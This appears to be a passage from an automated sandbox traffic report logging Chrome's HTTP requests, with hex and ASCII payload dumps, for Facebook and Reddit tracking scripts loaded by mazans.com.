                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC11976INData Raw: 72 65 71 75 65 73 74 53 74 72 69 6e 67 42 75 69 6c 64 65 72 28 21 31 2c 6e 29 3b 74 72 79 7b 69 66 28 74 68 69 73 2e 5f 69 73 49 64 65 6e 74 69 66 79 56 31 43 61 6c 6c 4f 62 76 69 6f 75 73 6c 79 57 72 6f 6e 67 28 72 29 29 7b 76 61 72 20 70 3d 74 2e 69 73 55 6e 64 65 66 69 6e 65 64 28 72 2e 65 6d 61 69 6c 29 3f 72 2e 68 61 6e 64 6c 65 3a 72 2e 65 6d 61 69 6c 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 74 68 69 73 2e 5f 68 61 6e 64 6c 65 4f 62 76 69 6f 75 73 6c 79 57 72 6f 6e 67 49 64 65 6e 74 69 66 79 43 61 6c 6c 28 70 29 7d 7d 63 61 74 63 68 28 65 29 7b 74 68 69 73 2e 5f 72 65 63 6f 72 64 4f 62 76 69 6f 75 73 6c 79 57 72 6f 6e 67 49 64 65 6e 74 69 66 79 46 61 69 6c 75 72 65 28 65 29 7d 76 61 72 20 76 3d 69 2e 74 72 75 6e 63 61 74 65 4b 65 79 73 41 6e 64 56 61
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: requestStringBuilder(!1,n);try{if(this._isIdentifyV1CallObviouslyWrong(r)){var p=t.isUndefined(r.email)?r.handle:r.email;return void this._handleObviouslyWrongIdentifyCall(p)}}catch(e){this._recordObviouslyWrongIdentifyFailure(e)}var v=i.truncateKeysAndVa


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          43192.168.2.1749840157.240.0.64436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC531OUTGET /en_US/fbevents.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: connect.facebook.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC1452INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          timing-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                                                                                                                                                          report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                                                                                                                                                          content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-n87eqEnn' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                                                                                                                                                                                                                                                          document-policy: force-load-at-top
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC1671INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC1INData Raw: 2f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: /
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC14680INData Raw: 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69 74
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: *** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wit
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC16384INData Raw: 26 63 21 3d 6e 75 6c 6c 26 26 61 21 3d 6e 75 6c 6c 26 26 64 21 3d 6e 75 6c 6c 3f 7b 64 6f 6d 61 69 6e 5f 75 72 69 3a 62 2c 65 76 65 6e 74 5f 74 79 70 65 3a 63 2c 65 78 74 72 61 63 74 6f 72 5f 74 79 70 65 3a 64 2c 69 64 3a 61 7d 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 67 28 61 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65 63 74 22 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 61 3d 61 2e 65 78 74 72 61 63 74 6f 72 5f 63 6f 6e 66 69 67 3b 69 66 28 61 3d 3d 6e 75 6c 6c 7c 7c 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: &c!=null&&a!=null&&d!=null?{domain_uri:b,event_type:c,extractor_type:d,id:a}:null}function g(a){if(a==null||(typeof a==="undefined"?"undefined":i(a))!=="object")return null;a=a.extractor_config;if(a==null||(typeof a==="undefined"?"undefined":i(a))!=="obje
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC16384INData Raw: 72 20 6b 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 6b 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 62 3d 61 2e 54 79 70 65 64 3b 61 2e 63 6f 65 72 63 65 3b 61 2e 65 6e 66 6f 72 63 65 3b 61 3d 62 2e 61 72 72 61 79 4f 66 28 62 2e 6f 62 6a 65 63 74 57 69 74 68 46 69 65 6c 64 73 28 7b 61 6c 6c 6f 63 61 74 69 6f 6e 3a 62 2e 6e 75 6d 62 65 72 28 29 2c 63 6f 64 65 3a 62 2e 73 74 72 69 6e 67 28 29 2c 6e 61 6d 65 3a 62 2e 73 74 72 69 6e 67 28 29 2c 70 61 73 73 52 61 74 65 3a 62 2e 6e 75 6d 62 65 72 28 29 7d 29 29 3b 6b 2e 65 78 70 6f 72 74 73 3d 61 7d 29 28
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: r k={exports:{}};k.exports;(function(){"use strict";var a=f.getFbeventsModules("SignalsFBEventsTyped"),b=a.Typed;a.coerce;a.enforce;a=b.arrayOf(b.objectWithFields({allocation:b.number(),code:b.string(),name:b.string(),passRate:b.number()}));k.exports=a})(
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC16384INData Raw: 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 54 79 70 65 64 22 29 2c 64 3d 63 2e 54 79 70 65 64 2c 65 3d 63 2e 63 6f 65 72 63 65 3b 66 75 6e 63 74 69 6f 6e 20 67 28 61 2c 63 2c 66 2c 67 2c 68 29 7b 61 3d 65 28 61 2c 62 29 3b 63 3d 65 28 63 2c 64 2e 73 74 72 69 6e 67 28 29 29 3b 76 61 72 20 6a 3d 7b 7d 3b 66 21 3d 6e 75 6c 6c 26 26 28 74 79 70 65 6f 66 20 66 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 66 29 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 28 6a 3d 66 29 3b 66 3d 67 21 3d 6e 75 6c 6c 26 26 74 79 70 65 6f 66 20 67 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 67 3a 6e 75 6c 6c 3b 67 3d 7b 7d 3b 68 21 3d 6e 75 6c 6c 26 26 28 74 79 70 65 6f 66 20 68 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: es("SignalsFBEventsTyped"),d=c.Typed,e=c.coerce;function g(a,c,f,g,h){a=e(a,b);c=e(c,d.string());var j={};f!=null&&(typeof f==="undefined"?"undefined":i(f))==="object"&&(j=f);f=g!=null&&typeof g==="string"?g:null;g={};h!=null&&(typeof h==="undefined"?"und
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC1703INData Raw: 6c 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 61 29 7b 76 61 72 20 62 3d 5b 5d 3b 61 3d 6a 5b 61 2e 69 64 5d 7c 7c 7b 7d 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 63 29 26 26 62 2e 70 75 73 68 28 61 5b 63 5d 29 3b 72 65 74 75 72 6e 20 62 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 61 29 7b 72 65 74 75 72 6e 20 6e 28 61 29 2e 6c 65 6e 67 74 68 3e 30 7d 66 75 6e 63 74 69 6f 6e 20 70 28 61 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 61 29 3f 65 5b 61 5d 3a 61 7d 66 75 6e 63 74 69 6f 6e 20 71 28 61 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: l}function n(a){var b=[];a=j[a.id]||{};for(var c in a)Object.prototype.hasOwnProperty.call(a,c)&&b.push(a[c]);return b}function o(a){return n(a).length>0}function p(a){return Object.prototype.hasOwnProperty.call(e,a)?e[a]:a}function q(a){return Object.pro
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC14681INData Raw: 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 69 66 28 74 68 69 73 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 76 61 72 20 66 3d 62 28 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 2c 64 2e 6f 62 6a 65 63 74 28 29 29 3b 69 66 28 66 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 66 3d 6b 28 69 28 6a 28 66 29 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 63 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 2e 6d 61 70 21 3d 6e 75 6c 6c 26 26 61 20 69 6e 20 63 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 2e 6d 61 70 3f 63 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 2e 6d 61 70 5b 61 5d 3a 6e 75 6c 6c 7d 29
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: tsResolvedModules==null)return;if(this.moduleEncodings==null)return;var f=b(g.fbq.__fbeventsResolvedModules,d.object());if(f==null)return;f=k(i(j(f),function(a){return c.moduleEncodings.map!=null&&a in c.moduleEncodings.map?c.moduleEncodings.map[a]:null})
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC16384INData Raw: 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 50 61 72 61 6d 4c 69 73 74 22 29 2c 68 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 42 65 61 63 6f 6e 22 29 2c 69 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 47 45 54 22 29 2c 6a 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 58 48 52 22 29 3b 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 45 76 65 6e 74 73 22 29 3b 76 61 72 20 6c 3d 62 2e 66 69 72 65 64 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 61 2c 62 29 7b 76
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: dules("SignalsParamList"),h=f.getFbeventsModules("signalsFBEventsSendBeacon"),i=f.getFbeventsModules("signalsFBEventsSendGET"),j=f.getFbeventsModules("signalsFBEventsSendXHR");b=f.getFbeventsModules("SignalsFBEventsEvents");var l=b.fired;function m(a,b){v
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC16384INData Raw: 61 79 28 61 29 7c 7c 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65 63 74 22 26 26 74 79 70 65 6f 66 20 61 21 3d 3d 22 73 74 72 69 6e 67 22 7c 7c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 7c 7c 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 3d 22 66 75 6e 63 74 69 6f 6e 22
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ay(a)||a==null)throw new g();return a}}function s(){return function(a){if((typeof a==="undefined"?"undefined":i(a))!=="object"&&typeof a!=="string"||Array.isArray(a)||a==null)throw new g();return a}}function t(){return function(a){if(typeof a!=="function"


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          44192.168.2.1749852151.101.129.1404436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC526OUTGET /ads/pixel.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: www.redditstatic.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 12126
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 15 Oct 2024 19:34:59 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "5e9ac3a42b557bf8ca38cf2e8baba70b"
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=60
                                                                                                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:14 GMT
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding,Origin
                                                                                                                                                                                                                                                                                                                                                                          Server: snooserv
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
                                                                                                                                                                                                                                                                                                                                                                          NEL: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 0.02, "failure_fraction": 0.02}
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC1378INData Raw: 1f 8b 08 00 00 00 00 00 00 03 d4 3b 6b 73 da c8 96 7f 05 ab 6e b8 92 69 cb 80 b1 93 08 6b 5c 04 e4 98 89 8d bd 3c 9c 4c b9 18 4a 96 1a 50 22 24 46 12 71 bc 86 fd ed 7b fa 25 b5 04 b6 93 3b 3b 1f 36 95 42 dd 7d 4e 9f 77 9f 3e dd 92 f7 a6 ab c0 49 bc 30 28 45 2a 46 01 4a b4 a7 74 24 54 3d 34 d5 9e bc a9 ba 17 dc 79 63 d6 c2 b4 f5 dd 8e 4a 8e a9 08 54 c5 34 93 c7 25 0e a7 a5 08 ff b5 f2 22 5c 2e f3 46 93 cc 99 96 cb 8e 16 e1 64 15 05 25 07 88 ee 55 35 32 be 12 63 2b 3e 46 a8 da 66 80 1f 4a 56 14 85 91 aa b4 ed 20 08 93 d2 d4 0b dc d2 22 74 57 3e 2e fd 5b a9 78 15 e5 df 8a d6 4c e6 51 f8 50 b2 75 27 74 b1 a9 5c 5d 77 46 97 d6 a4 77 3d 9c 9c 5f 8f 7a 1d 05 d9 1b 42 6f 69 12 d9 cd 27 fc 63 19 46 49 6c 3c 6d 36 4d a2 c3 5d 75 ac 3b b6 ef ab 4b 9d 83 90 d0 46 8d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ;ksnik\<LJP"$Fq{%;;6B}Nw>I0(E*FJt$T=4ycJT4%"\.Fd%U52c+>FfJV "tW>.[xLQPu't\]wFw=_zBoi'cFIl<m6M]u;KF
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC1378INData Raw: 35 f4 02 55 21 55 c8 12 ba 52 28 00 06 cc cb 94 67 fd 4b 16 4d ac c3 63 0b 15 bc 28 63 12 5f d6 b5 4c bb 23 58 a4 94 11 f1 20 a7 02 9b 27 d8 1f ce 82 75 0d 81 8c 74 ed 7a 6f de ed 37 5e f5 af cc e9 b0 4e 72 fd 25 54 64 41 8d bb 96 77 fe 31 ef fa 94 fe df 77 b0 44 87 39 8f 39 4c 9f 46 e1 82 8c b6 61 1b a0 6e cf fc 27 4f 79 d6 85 0c 29 e7 c5 74 88 3b 32 ed 3f e3 cb 02 3e 55 4a 56 65 6d aa a0 41 39 23 e3 70 79 5b 89 ea 69 c2 97 a0 e8 ab be 2c 70 22 ce 1c 25 d3 77 dc 95 b4 f9 8a 23 a5 d2 de c5 64 eb 1c f5 bb ed 70 b1 84 4c 04 c1 86 63 c7 5e 62 95 c5 84 b4 9b 66 04 b4 b4 dc 07 5a c5 52 ff ca f6 c1 86 0b a8 e6 47 c3 f3 83 77 25 d7 4e 6c 85 08 59 b0 f9 0a 04 a5 16 e7 92 70 7e 14 4b 5d 05 5c 0a b6 b5 e7 e4 13 13 35 42 f4 c3 6a 3a c5 11 76 3f f8 a1 f3 ad e5 cf c2
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 5U!UR(gKMc(c_L#X 'utzo7^Nr%TdAw1wD99LFan'Oy)t;2?>UJVemA9#py[i,p"%w#dpLc^bfZRGw%NlYp~K]\5Bj:v?
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC1378INData Raw: 3e a6 01 51 71 68 ef 68 4c e3 a2 e2 d2 5e 63 4c c3 a3 82 69 ef 78 4c a3 a4 32 a5 bd 93 31 0d 96 ca 8c f6 de 8e 69 cc 54 e6 eb 2a 0d d7 f3 ad 7a 88 65 bb 9f 3a d5 04 64 09 0e c3 c4 f6 cd 77 fb c5 63 15 83 5e e2 69 02 c0 5c 81 2d 6a 81 94 e6 5d 8a 0a 46 3d 86 93 7d ad fe 8e 9e df d3 f1 37 47 f5 4c 84 bb 5a a3 a2 a6 a0 ca 49 03 66 bd 3f 3d 6d 68 63 96 19 a7 7e 08 8b 2c 13 ee 30 4b 5e 9a 4c e5 f8 39 2a d9 d4 fc c9 c0 6c ec 67 27 09 7e 6b b1 ab cc 64 ab fa c5 43 00 cf 3b af 1c 03 68 d2 91 f2 44 fe 18 00 55 56 bb 90 c7 72 a5 a6 ca 60 a4 2c 23 f5 e0 6e cc b4 50 14 d8 bc 60 43 69 9d c0 c6 ff 3f 96 09 c7 3f 51 26 28 ab 18 97 c8 c5 02 68 46 f7 0a cf 45 ed eb de 60 d8 ea 0d 07 66 4e 76 fa 12 2c 89 15 72 e1 49 2c 26 43 d9 08 80 c8 1b 64 18 c6 71 42 77 8b 2f 57 97 17
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: >QqhhL^cLixL21iT*ze:dwc^i\-j]F=}7GLZIf?=mhc~,0K^L9*lg'~kdC;hDUVr`,#nP`Ci??Q&(hFE`fNv,rI,&CdqBw/W
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:14 UTC1378INData Raw: 86 7f dc 58 06 db 6c 21 57 92 87 82 a8 6c f0 03 8c 05 da c0 ba b4 da c3 eb 1c fe a4 3d 18 f0 39 a4 a9 f0 6d 6b 68 7d 19 8a 61 d2 a6 f4 08 df 61 ab db 1b 50 c2 69 8f c1 ac 2f b0 b0 19 80 36 81 6f 1a f1 40 00 b2 54 c6 19 b6 2c 0b 16 2a 7d 90 8d 85 89 05 69 9f b7 e4 b9 45 a1 89 b8 29 90 4a cc 64 4d c7 a8 b8 1b f2 8f 7e b8 fc f6 3f 39 25 bc 7a 44 80 ea eb bf 56 38 7a 84 34 0a eb 3f c9 9f 16 fe 22 10 f1 19 9a be 85 8a 58 6d 1c cb 53 f8 10 50 26 1b fc f7 86 0c a3 5b be 86 6c 58 b8 de 02 2a 42 28 59 60 35 d3 d4 9d 95 8c 04 29 fd c0 8b 1c 4d 3a e4 ed 05 61 4e 26 a9 5a 45 d1 95 0a 41 da 34 b9 da fa 4e 82 bb 06 85 a1 c8 3d 1a b9 9f 1b 01 99 73 f2 09 01 85 de d6 33 29 1c 36 42 b2 18 ff 56 73 e9 7b 89 29 0d d3 57 74 50 3e eb 4a 7a 1a a6 23 fc c0 7d 5a 3f 93 90 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: Xl!Wl=9mkh}aaPi/6o@T,*}iE)JdM~?9%zDV8z4?"XmSP&[lX*B(Y`5)M:aN&ZEA4N=s3)6BVs{)WtP>Jz#}Z?
